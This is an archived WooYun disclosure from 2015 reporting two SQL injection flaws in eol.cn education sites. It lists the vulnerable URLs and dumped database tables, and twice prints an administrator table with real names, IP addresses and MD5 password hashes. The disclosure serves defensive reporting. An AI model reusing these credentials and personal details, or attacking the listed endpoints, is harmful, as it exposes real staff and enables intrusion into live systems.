当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096804

漏洞标题:中国教育在线SQL注入两枚

相关厂商:eol.cn

漏洞作者: Taro

提交时间:2015-02-14 10:15

修复时间:2015-02-19 10:16

公开时间:2015-02-19 10:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-14: 细节已通知厂商并且等待厂商处理中
2015-02-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

研究生报名查询系统,示范高中信息库

详细说明:

研究生报名查询系统
http://souky.eol.cn/fenshu_search_34.php?=88952634&schoolid=5&xueke=01&xuewei_class=1

F508BEA267A0488A98B277BA5CFF3FCD.png


Database: souky5
[58 tables]
+----------------------------------------+
| adminlog |
| adminuser |
| allpro |
| allpro_1017 |
| allpro_20120910 |
| allpro_back |
| allpro_new |
| allprovisit |
| allprovisit_1017 |
| allprovisit_back |
| cf_special |
| css |
| exam |
| exp_expert |
| exp_expert1 |
| fenshu_34 |
| fenshu_search |
| guestbook |
| iplog |
| laboratory |
| province |
| school |
| school_20120419 |
| school_20120910 |
| school_20121017 |
| school_20121226 |
| school_20130218 |
| school_adminlog |
| school_assessment |
| school_gkcx |
| school_matriculate |
| school_prodetail |
| school_rand |
| school_scale |
| schooladminuser |
| schooladminuser_exit_opzhaiyb_20121111 |
| schoolbook |
| schoolexam |
| schoolexam_20111223 |
| schoolmsg |
| schoolnews |
| schoolpinyin |
| schoolpro |
| schoolpro_1017 |
| schoolproall |
| schoolrepoint |
| schooltiaoji |
| schooltiaojipro |
| schoolwill |
| souky_right |
| special_rand |
| studentinfo |
| sys_school |
| takeinfo |
| tiaoji_info |
| trs_channel |
| uplog |
| wap_msouky |
+----------------------------------------+


Database: souky5
Table: adminuser
[4 entries]
+-----+-----------------+--------+----------------------------------+----------+----------+----------+------------+
| uid | lastip | states | userpwd | username | loginnum | realname | lastlogin |
+-----+-----------------+--------+----------------------------------+----------+----------+----------+------------+
| 1 | 219.224.99.201 | 1 | 8cbe78b697d390eb72be24e9e931b60c | admin | 2208 | 管理员 | 1423536937 |
| 294 | 219.224.99.201 | 1 | 88a90e83683f71659459d163690b08ab | wanghuan | 193 | 王欢 | 1423537196 |
| 242 | 202.205.109.190 | 1 | 0d012b40871ce20100270562346a52fe | zhang_yq | 16 | 张祎青 | 1423557605 |
| 247 | 202.205.109.190 | 1 | 25ffc27364f4e5235474b8681aeefd83 | yanr | 33 | 闫蕊 | 1423562698 |
+-----+-----------------+--------+----------------------------------+----------+----------+----------+------------+


示范高中信息库
http://haogaozhong.eol.cn/school_area.php?province=11

91A616B425E448F780B6E57C96AE7D89.png


Database: haogaozhong
[48 tables]
+--------------------------+
| album_manager |
| area_info |
| block_config |
| branch_hot |
| cctv_english |
| cf_area |
| cf_city |
| cf_province |
| cf_town |
| cooperation |
| module_album |
| module_content |
| module_content_type |
| module_facilities |
| module_gaokao |
| module_goodstudents |
| module_link |
| module_scores |
| module_scores_titles |
| module_teachers |
| school_basic |
| school_basic_haogaozhong |
| school_basic_test |
| school_branch |
| school_branch_info |
| school_branch_type |
| school_config |
| school_detail |
| school_eva |
| school_eva_detail |
| school_event |
| school_faq |
| school_grades_type |
| school_hits |
| school_hot |
| school_impinfo |
| school_info |
| school_module |
| school_module_content |
| school_module_custom |
| school_news |
| school_up |
| school_user |
| school_user_school |
| sph_counter |
| sys_error |
| sys_keywords |
| sys_log |
+--------------------------+


漏洞证明:

Database: souky5
Table: adminuser
[4 entries]
+-----+-----------------+--------+----------------------------------+----------+----------+----------+------------+
| uid | lastip | states | userpwd | username | loginnum | realname | lastlogin |
+-----+-----------------+--------+----------------------------------+----------+----------+----------+------------+
| 1 | 219.224.99.201 | 1 | 8cbe78b697d390eb72be24e9e931b60c | admin | 2208 | 管理员 | 1423536937 |
| 294 | 219.224.99.201 | 1 | 88a90e83683f71659459d163690b08ab | wanghuan | 193 | 王欢 | 1423537196 |
| 242 | 202.205.109.190 | 1 | 0d012b40871ce20100270562346a52fe | zhang_yq | 16 | 张祎青 | 1423557605 |
| 247 | 202.205.109.190 | 1 | 25ffc27364f4e5235474b8681aeefd83 | yanr | 33 | 闫蕊 | 1423562698 |
+-----+-----------------+--------+----------------------------------+----------+----------+----------+------------+

修复方案:

版权声明:转载请注明来源 Taro@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-19 10:16

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论